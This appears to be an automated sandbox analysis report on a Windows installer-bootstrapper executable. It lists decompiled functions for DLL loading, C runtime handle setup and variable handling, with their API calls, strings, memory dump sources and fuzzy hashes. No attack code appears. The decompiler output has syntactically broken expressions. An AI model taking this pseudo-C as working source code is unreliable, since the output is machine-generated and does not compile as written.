                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040311E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00403128
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 00403194
                                                                                                                                                                  • Failed to get msi.dll version info., xrefs: 00403170
                                                                                                                                                                  • variable.cpp, xrefs: 0040314C
                                                                                                                                                                  • DllGetVersion, xrefs: 0040310C
                                                                                                                                                                  • Failed to find DllGetVersion entry point in msi.dll., xrefs: 00403156
                                                                                                                                                                  • msi, xrefs: 00403111
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                  • String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
                                                                                                                                                                  • API String ID: 4275029093-842451892
                                                                                                                                                                  • Opcode ID: 61e93e2cf5fe21059742e6938a0019da0ffc838fbe178dce55be459690a90973
                                                                                                                                                                  • Instruction ID: 00c3173276fc620b4457567019cff447681b78f5feee3fbe466217bf40f687bc
                                                                                                                                                                  • Opcode Fuzzy Hash: 61e93e2cf5fe21059742e6938a0019da0ffc838fbe178dce55be459690a90973
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C11DA31A40725BBEB10ABB9AC45BBFB6E8AB0C751F10012BF901F7180D778990046ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408878, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 18%
                                                                                                                                                                  			E00408878(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HINSTANCE__* _t9;
				signed short _t15;
				signed short _t18;
				intOrPtr* _t21;
				intOrPtr _t24;
				void* _t25;

				_t24 = _a4;
				_t9 = LoadLibraryW( *( *((intOrPtr*)(_t24 + 4)) + 0x50));
				 *(_t24 + 0xc) = _t9;
				if(_t9 != 0) {
					_t21 = GetProcAddress(_t9, "BootstrapperApplicationCreate");
					if(_t21 != 0) {
						_t5 = _t24 + 0x10; // 0x10
						_t25 =  *_t21(_a8, _a12, _t5);
						if(_t25 < 0) {
							_push("Failed to create UX.");
							goto L6;
						}
					} else {
						_t15 = GetLastError();
						_t28 =  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
						_t25 =  >=  ? 0x80004005 :  <=  ? _t15 : _t15 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "userexperience.cpp", 0x68, _t25);
						_push("Failed to get BootstrapperApplicationCreate entry-point");
						goto L6;
					}
				} else {
					_t18 = GetLastError();
					_t31 =  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
					_t25 =  >=  ? 0x80004005 :  <=  ? _t18 : _t18 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "userexperience.cpp", 0x64, _t25);
					_push("Failed to load UX DLL.");
					L6:
					_push(_t25);
					E00430A57();
				}
				return _t25;
			}









                                                                                                                                                                  0x0040887c
                                                                                                                                                                  0x00408885
                                                                                                                                                                  0x0040888b
                                                                                                                                                                  0x00408890
                                                                                                                                                                  0x004088d0
                                                                                                                                                                  0x004088d4
                                                                                                                                                                  0x00408908
                                                                                                                                                                  0x00408914
                                                                                                                                                                  0x00408918
                                                                                                                                                                  0x0040891a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040891a
                                                                                                                                                                  0x004088d6
                                                                                                                                                                  0x004088d6
                                                                                                                                                                  0x004088e7
                                                                                                                                                                  0x004088f1
                                                                                                                                                                  0x004088fc
                                                                                                                                                                  0x00408901
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408901
                                                                                                                                                                  0x00408892
                                                                                                                                                                  0x00408892
                                                                                                                                                                  0x004088a3
                                                                                                                                                                  0x004088ad
                                                                                                                                                                  0x004088b8
                                                                                                                                                                  0x004088bd
                                                                                                                                                                  0x0040891f
                                                                                                                                                                  0x0040891f
                                                                                                                                                                  0x00408920
                                                                                                                                                                  0x00408926
                                                                                                                                                                  0x0040892b

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNEL32(?,00000000,?,004013CC,000000B8,?,0000001C,00000000,00000000,?,?,?,?,00401EA4,?,?), ref: 00408885
                                                                                                                                                                  • GetLastError.KERNEL32(?,004013CC,000000B8,?,0000001C,00000000,00000000,?,?,?,?,00401EA4,?,?), ref: 00408892
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 004088CA
                                                                                                                                                                  • GetLastError.KERNEL32(?,004013CC,000000B8,?,0000001C,00000000,00000000,?,?,?,?,00401EA4,?,?), ref: 004088D6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                  • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                                  • API String ID: 1866314245-2276003667
                                                                                                                                                                  • Opcode ID: 22fb72b810ae8fbde16b8a3797fc88ad88388fe9fc8be667d8966cac1321a6db
                                                                                                                                                                  • Instruction ID: 960b82d4b4fe11ee768066112e35dd7487824440bcb93e6e2eec702ee6f8a908
                                                                                                                                                                  • Opcode Fuzzy Hash: 22fb72b810ae8fbde16b8a3797fc88ad88388fe9fc8be667d8966cac1321a6db
                                                                                                                                                                  • Instruction Fuzzy Hash: 6811C632B40721ABDB256A69AD09B6B76D4EF08750F11513BFD45F7290EB39CC008AED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00429B5D, Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E00429B5D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t80;
				signed int _t84;
				long _t88;
				intOrPtr _t92;
				signed int _t96;
				signed int _t97;
				signed char _t101;
				intOrPtr* _t103;
				intOrPtr _t104;
				intOrPtr* _t107;
				signed char _t109;
				long _t117;
				signed int _t126;
				signed int* _t130;
				intOrPtr _t131;
				signed int* _t134;
				void** _t135;
				intOrPtr _t137;
				void* _t138;
				signed int _t139;
				void** _t143;
				signed int _t145;
				void* _t146;
				void** _t150;
				void* _t151;

				_push(0x64);
				_push(0x454100);
				E0042A650(__ebx, __edi, __esi);
				E0042BF92(0xb);
				_t126 = 0;
				 *(_t151 - 4) = 0;
				_push(0x40);
				_t137 = 0x20;
				_push(_t137);
				_t80 = E0042C10B();
				_t130 = _t80;
				 *(_t151 - 0x24) = _t130;
				if(_t130 != 0) {
					 *0x457610 = _t80;
					 *0x459054 = _t137;
					while(_t130 <  &(_t80[0x200])) {
						_t130[1] = 0xa00;
						 *_t130 =  *_t130 | 0xffffffff;
						_t130[2] = _t126;
						_t130[9] = _t130[9] & 0x00000080;
						_t130[9] = _t130[9] & 0x0000007f;
						_t130[9] = 0xa0a;
						_t130[0xe] = _t126;
						_t130[0xd] = _t126;
						_t130 =  &(_t130[0x10]);
						 *(_t151 - 0x24) = _t130;
						_t80 =  *0x457610;
					}
					GetStartupInfoW(_t151 - 0x74);
					if( *((short*)(_t151 - 0x42)) == 0) {
						while(1) {
							L27:
							 *(_t151 - 0x2c) = _t126;
							if(_t126 >= 3) {
								break;
							}
							_t143 =  *0x457610 + (_t126 << 6);
							 *(_t151 - 0x24) = _t143;
							if( *_t143 == 0xffffffff ||  *_t143 == 0xfffffffe) {
								_t143[1] = 0x81;
								if(_t126 != 0) {
									_t65 = _t126 - 1; // -1
									asm("sbb eax, eax");
									_t88 =  ~_t65 + 0xfffffff5;
								} else {
									_t88 = 0xfffffff6;
								}
								_t138 = GetStdHandle(_t88);
								if(_t138 == 0xffffffff || _t138 == 0) {
									L43:
									_t143[1] = _t143[1] | 0x00000040;
									 *_t143 = 0xfffffffe;
									_t92 =  *0x457fa0;
									if(_t92 != 0) {
										 *( *((intOrPtr*)(_t92 + _t126 * 4)) + 0x10) = 0xfffffffe;
									}
									goto L45;
								} else {
									_t96 = GetFileType(_t138);
									if(_t96 == 0) {
										goto L43;
									}
									 *_t143 = _t138;
									_t97 = _t96 & 0x000000ff;
									if(_t97 != 2) {
										if(_t97 != 3) {
											L42:
											_t69 =  &(_t143[3]); // -4552196
											InitializeCriticalSectionAndSpinCount(_t69, 0xfa0);
											_t143[2] = _t143[2] + 1;
											goto L45;
										}
										_t101 = _t143[1] | 0x00000008;
										L41:
										_t143[1] = _t101;
										goto L42;
									}
									_t101 = _t143[1] | 0x00000040;
									goto L41;
								}
							} else {
								_t143[1] = _t143[1] | 0x00000080;
								L45:
								_t126 = _t126 + 1;
								continue;
							}
						}
						 *(_t151 - 4) = 0xfffffffe;
						E00429E02();
						_t84 = 0;
						L47:
						return E0042A695(_t84);
					}
					_t103 =  *((intOrPtr*)(_t151 - 0x40));
					if(_t103 == 0) {
						goto L27;
					}
					_t131 =  *_t103;
					 *((intOrPtr*)(_t151 - 0x1c)) = _t131;
					_t104 = _t103 + 4;
					 *((intOrPtr*)(_t151 - 0x28)) = _t104;
					 *(_t151 - 0x20) = _t104 + _t131;
					if(_t131 >= 0x800) {
						_t131 = 0x800;
						 *((intOrPtr*)(_t151 - 0x1c)) = 0x800;
					}
					_t145 = 1;
					 *(_t151 - 0x30) = 1;
					while( *0x459054 < _t131) {
						_t134 = E0042C10B(_t137, 0x40);
						 *(_t151 - 0x24) = _t134;
						if(_t134 != 0) {
							0x457610[_t145] = _t134;
							 *0x459054 =  *0x459054 + _t137;
							while(_t134 <  &(0x457610[_t145][0x200])) {
								_t134[1] = 0xa00;
								 *_t134 =  *_t134 | 0xffffffff;
								_t134[2] = _t126;
								_t134[9] = _t134[9] & 0x00000080;
								_t134[9] = 0xa0a;
								_t134[0xe] = _t126;
								_t134[0xd] = _t126;
								_t134 =  &(_t134[0x10]);
								 *(_t151 - 0x24) = _t134;
							}
							_t145 = _t145 + 1;
							 *(_t151 - 0x30) = _t145;
							_t131 =  *((intOrPtr*)(_t151 - 0x1c));
							continue;
						}
						_t131 =  *0x459054;
						 *((intOrPtr*)(_t151 - 0x1c)) = _t131;
						break;
					}
					_t139 = _t126;
					 *(_t151 - 0x2c) = _t139;
					_t107 =  *((intOrPtr*)(_t151 - 0x28));
					_t135 =  *(_t151 - 0x20);
					while(_t139 < _t131) {
						_t146 =  *_t135;
						if(_t146 == 0xffffffff || _t146 == 0xfffffffe) {
							L22:
							_t139 = _t139 + 1;
							 *(_t151 - 0x2c) = _t139;
							_t107 =  *((intOrPtr*)(_t151 - 0x28)) + 1;
							 *((intOrPtr*)(_t151 - 0x28)) = _t107;
							_t135 =  &(_t135[1]);
							 *(_t151 - 0x20) = _t135;
							continue;
						} else {
							_t109 =  *_t107;
							if((_t109 & 0x00000001) == 0) {
								goto L22;
							}
							if((_t109 & 0x00000008) != 0) {
								L20:
								_t150 = 0x457610[_t139 >> 5] + ((_t139 & 0x0000001f) << 6);
								 *(_t151 - 0x24) = _t150;
								 *_t150 =  *_t135;
								_t150[1] =  *((intOrPtr*)( *((intOrPtr*)(_t151 - 0x28))));
								_t37 =  &(_t150[3]); // 0xd
								InitializeCriticalSectionAndSpinCount(_t37, 0xfa0);
								_t150[2] = _t150[2] + 1;
								_t135 =  *(_t151 - 0x20);
								L21:
								_t131 =  *((intOrPtr*)(_t151 - 0x1c));
								goto L22;
							}
							_t117 = GetFileType(_t146);
							_t135 =  *(_t151 - 0x20);
							if(_t117 == 0) {
								goto L21;
							}
							goto L20;
						}
					}
					goto L27;
				}
				_t84 = E0042D520(_t151, 0x4560d0, _t151 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L47;
			}




























                                                                                                                                                                  0x00429b5d
                                                                                                                                                                  0x00429b5f
                                                                                                                                                                  0x00429b64
                                                                                                                                                                  0x00429b6b
                                                                                                                                                                  0x00429b71
                                                                                                                                                                  0x00429b73
                                                                                                                                                                  0x00429b76
                                                                                                                                                                  0x00429b7a
                                                                                                                                                                  0x00429b7b
                                                                                                                                                                  0x00429b7c
                                                                                                                                                                  0x00429b83
                                                                                                                                                                  0x00429b85
                                                                                                                                                                  0x00429b8a
                                                                                                                                                                  0x00429ba7
                                                                                                                                                                  0x00429bac
                                                                                                                                                                  0x00429bb2
                                                                                                                                                                  0x00429bbb
                                                                                                                                                                  0x00429bc1
                                                                                                                                                                  0x00429bc4
                                                                                                                                                                  0x00429bc7
                                                                                                                                                                  0x00429bd0
                                                                                                                                                                  0x00429bd3
                                                                                                                                                                  0x00429bd9
                                                                                                                                                                  0x00429bdc
                                                                                                                                                                  0x00429bdf
                                                                                                                                                                  0x00429be2
                                                                                                                                                                  0x00429be5
                                                                                                                                                                  0x00429be5
                                                                                                                                                                  0x00429bf0
                                                                                                                                                                  0x00429bfb
                                                                                                                                                                  0x00429d2a
                                                                                                                                                                  0x00429d2a
                                                                                                                                                                  0x00429d2a
                                                                                                                                                                  0x00429d30
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429d3b
                                                                                                                                                                  0x00429d41
                                                                                                                                                                  0x00429d47
                                                                                                                                                                  0x00429d5c
                                                                                                                                                                  0x00429d62
                                                                                                                                                                  0x00429d69
                                                                                                                                                                  0x00429d6e
                                                                                                                                                                  0x00429d70
                                                                                                                                                                  0x00429d64
                                                                                                                                                                  0x00429d66
                                                                                                                                                                  0x00429d66
                                                                                                                                                                  0x00429d7a
                                                                                                                                                                  0x00429d7f
                                                                                                                                                                  0x00429dc6
                                                                                                                                                                  0x00429dcc
                                                                                                                                                                  0x00429dcf
                                                                                                                                                                  0x00429dd5
                                                                                                                                                                  0x00429ddc
                                                                                                                                                                  0x00429de1
                                                                                                                                                                  0x00429de1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429d85
                                                                                                                                                                  0x00429d86
                                                                                                                                                                  0x00429d8e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429d90
                                                                                                                                                                  0x00429d92
                                                                                                                                                                  0x00429d9a
                                                                                                                                                                  0x00429da7
                                                                                                                                                                  0x00429db2
                                                                                                                                                                  0x00429db7
                                                                                                                                                                  0x00429dbb
                                                                                                                                                                  0x00429dc1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429dc1
                                                                                                                                                                  0x00429dad
                                                                                                                                                                  0x00429daf
                                                                                                                                                                  0x00429daf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429daf
                                                                                                                                                                  0x00429da0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429da0
                                                                                                                                                                  0x00429d4e
                                                                                                                                                                  0x00429d54
                                                                                                                                                                  0x00429de8
                                                                                                                                                                  0x00429de8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429de8
                                                                                                                                                                  0x00429d47
                                                                                                                                                                  0x00429dee
                                                                                                                                                                  0x00429df5
                                                                                                                                                                  0x00429dfa
                                                                                                                                                                  0x00429dfc
                                                                                                                                                                  0x00429e01
                                                                                                                                                                  0x00429e01
                                                                                                                                                                  0x00429c01
                                                                                                                                                                  0x00429c06
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429c0c
                                                                                                                                                                  0x00429c0e
                                                                                                                                                                  0x00429c11
                                                                                                                                                                  0x00429c14
                                                                                                                                                                  0x00429c19
                                                                                                                                                                  0x00429c23
                                                                                                                                                                  0x00429c25
                                                                                                                                                                  0x00429c27
                                                                                                                                                                  0x00429c27
                                                                                                                                                                  0x00429c2c
                                                                                                                                                                  0x00429c2d
                                                                                                                                                                  0x00429c30
                                                                                                                                                                  0x00429c42
                                                                                                                                                                  0x00429c44
                                                                                                                                                                  0x00429c49
                                                                                                                                                                  0x00429cdd
                                                                                                                                                                  0x00429ce4
                                                                                                                                                                  0x00429cea
                                                                                                                                                                  0x00429cfa
                                                                                                                                                                  0x00429d00
                                                                                                                                                                  0x00429d03
                                                                                                                                                                  0x00429d06
                                                                                                                                                                  0x00429d0a
                                                                                                                                                                  0x00429d10
                                                                                                                                                                  0x00429d13
                                                                                                                                                                  0x00429d16
                                                                                                                                                                  0x00429d19
                                                                                                                                                                  0x00429d19
                                                                                                                                                                  0x00429d1e
                                                                                                                                                                  0x00429d1f
                                                                                                                                                                  0x00429d22
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429d22
                                                                                                                                                                  0x00429c4f
                                                                                                                                                                  0x00429c55
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429c55
                                                                                                                                                                  0x00429c58
                                                                                                                                                                  0x00429c5a
                                                                                                                                                                  0x00429c5d
                                                                                                                                                                  0x00429c60
                                                                                                                                                                  0x00429c63
                                                                                                                                                                  0x00429c6b
                                                                                                                                                                  0x00429c70
                                                                                                                                                                  0x00429cca
                                                                                                                                                                  0x00429cca
                                                                                                                                                                  0x00429ccb
                                                                                                                                                                  0x00429cd1
                                                                                                                                                                  0x00429cd2
                                                                                                                                                                  0x00429cd5
                                                                                                                                                                  0x00429cd8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429c77
                                                                                                                                                                  0x00429c77
                                                                                                                                                                  0x00429c7b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429c7f
                                                                                                                                                                  0x00429c8f
                                                                                                                                                                  0x00429c9c
                                                                                                                                                                  0x00429ca3
                                                                                                                                                                  0x00429ca8
                                                                                                                                                                  0x00429caf
                                                                                                                                                                  0x00429cb7
                                                                                                                                                                  0x00429cbb
                                                                                                                                                                  0x00429cc1
                                                                                                                                                                  0x00429cc4
                                                                                                                                                                  0x00429cc7
                                                                                                                                                                  0x00429cc7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429cc7
                                                                                                                                                                  0x00429c82
                                                                                                                                                                  0x00429c88
                                                                                                                                                                  0x00429c8d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429c8d
                                                                                                                                                                  0x00429c70
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00429c63
                                                                                                                                                                  0x00429b9f
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • __lock.LIBCMT ref: 00429B6B
                                                                                                                                                                    • Part of subcall function 0042BF92: __mtinitlocknum.LIBCMT ref: 0042BFA4
                                                                                                                                                                    • Part of subcall function 0042BF92: EnterCriticalSection.KERNEL32(00000000,?,00429541,0000000D,004540B8,00000008,004294D3,00000000,00000000,004079F6,?,00000000,00000000), ref: 0042BFBD
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 00429B7C
                                                                                                                                                                    • Part of subcall function 0042C10B: __calloc_impl.LIBCMT ref: 0042C11A
                                                                                                                                                                    • Part of subcall function 0042C10B: Sleep.KERNEL32(00000000,?,00000000,00000000), ref: 0042C131
                                                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00429B97
                                                                                                                                                                  • GetStartupInfoW.KERNEL32(?,00454100,00000064,004266C2,00454020,00000014), ref: 00429BF0
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 00429C3B
                                                                                                                                                                  • GetFileType.KERNEL32(00000001), ref: 00429C82
                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00429CBB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1426640281-0
                                                                                                                                                                  • Opcode ID: c9411a8abbf85f478d1ab880688c87fedd54d18e30c9cc55dd02e0a31a442608
                                                                                                                                                                  • Instruction ID: 8d551ddd004060d1019122159fb97e913ffcdf69b41635f08ddf3200b2fcd79d
                                                                                                                                                                  • Opcode Fuzzy Hash: c9411a8abbf85f478d1ab880688c87fedd54d18e30c9cc55dd02e0a31a442608
                                                                                                                                                                  • Instruction Fuzzy Hash: 3481D070A047658FCB14CF69E8445AEBBF0AF06324F64466ED4A6AB3D1D7389C02DB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004182C0, Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 154COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 004182D5
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00418450
                                                                                                                                                                  Strings
                                                                                                                                                                  • UX requested unknown container with id: %ls, xrefs: 0041837A
                                                                                                                                                                  • Failed to set download user., xrefs: 004183D8
                                                                                                                                                                  • UX requested unknown payload with id: %ls, xrefs: 0041832A
                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 004182EF
                                                                                                                                                                  • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 00418340
                                                                                                                                                                  • Failed to set download password., xrefs: 004183FE
                                                                                                                                                                  • UX did not provide container or payload id., xrefs: 0041843F
                                                                                                                                                                  • Failed to set download URL., xrefs: 004183AF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                                  • API String ID: 3168844106-2615595102
                                                                                                                                                                  • Opcode ID: 9b40ea429c2442b82af3fddcc33d8dad9811c3a0ac86ccef15cac6ee9cc33822
                                                                                                                                                                  • Instruction ID: 8b9c9bf36d40ce3da9157b90a1db51c8b12dab0401afab681dfbeef49172537a
                                                                                                                                                                  • Opcode Fuzzy Hash: 9b40ea429c2442b82af3fddcc33d8dad9811c3a0ac86ccef15cac6ee9cc33822
                                                                                                                                                                  • Instruction Fuzzy Hash: 1541C732A00616EBDB159B25C845BEB73A8AF04714F19811FF804A7281EF7DED81C79D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403823, Relevance: 15.1, APIs: 2, Strings: 8, Instructions: 141COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,000000F8,000000F8,00000030,000000F8,00000100,?,00000000,?,?), ref: 00403841
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000), ref: 00403973
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to read variable value as number., xrefs: 00403947
                                                                                                                                                                  • Failed to read variable count., xrefs: 00403861
                                                                                                                                                                  • Failed to set variable., xrefs: 0040394E
                                                                                                                                                                  • Failed to read variable value type., xrefs: 00403955
                                                                                                                                                                  • Failed to read variable included flag., xrefs: 00403963
                                                                                                                                                                  • Failed to read variable value as string., xrefs: 00403934
                                                                                                                                                                  • Unsupported variable type., xrefs: 00403940
                                                                                                                                                                  • Failed to read variable name., xrefs: 0040395C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable.$Unsupported variable type.
                                                                                                                                                                  • API String ID: 3168844106-1201737872
                                                                                                                                                                  • Opcode ID: e32d11626433bc85d070770c40144c1c4ecda70c3155bf45de3f8399f304978e
                                                                                                                                                                  • Instruction ID: 7e7fe43a99885c93f0473ea38e717ae15ac85730e3e04eb0c339491cc76a7dbd
                                                                                                                                                                  • Opcode Fuzzy Hash: e32d11626433bc85d070770c40144c1c4ecda70c3155bf45de3f8399f304978e
                                                                                                                                                                  • Instruction Fuzzy Hash: 42419072801219BBCB119EA5D845EAFBF7CEB04751F108177F910B6290D778DE019BA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405F3B, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405F61
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405F86
                                                                                                                                                                  Strings
                                                                                                                                                                  • MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 00406074
                                                                                                                                                                  • Failed to get component path: %d, xrefs: 00405FEA
                                                                                                                                                                  • Failed to set variable., xrefs: 00406064
                                                                                                                                                                  • Failed to format component id string., xrefs: 00405F6C
                                                                                                                                                                  • Failed to format product code string., xrefs: 00405F91
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
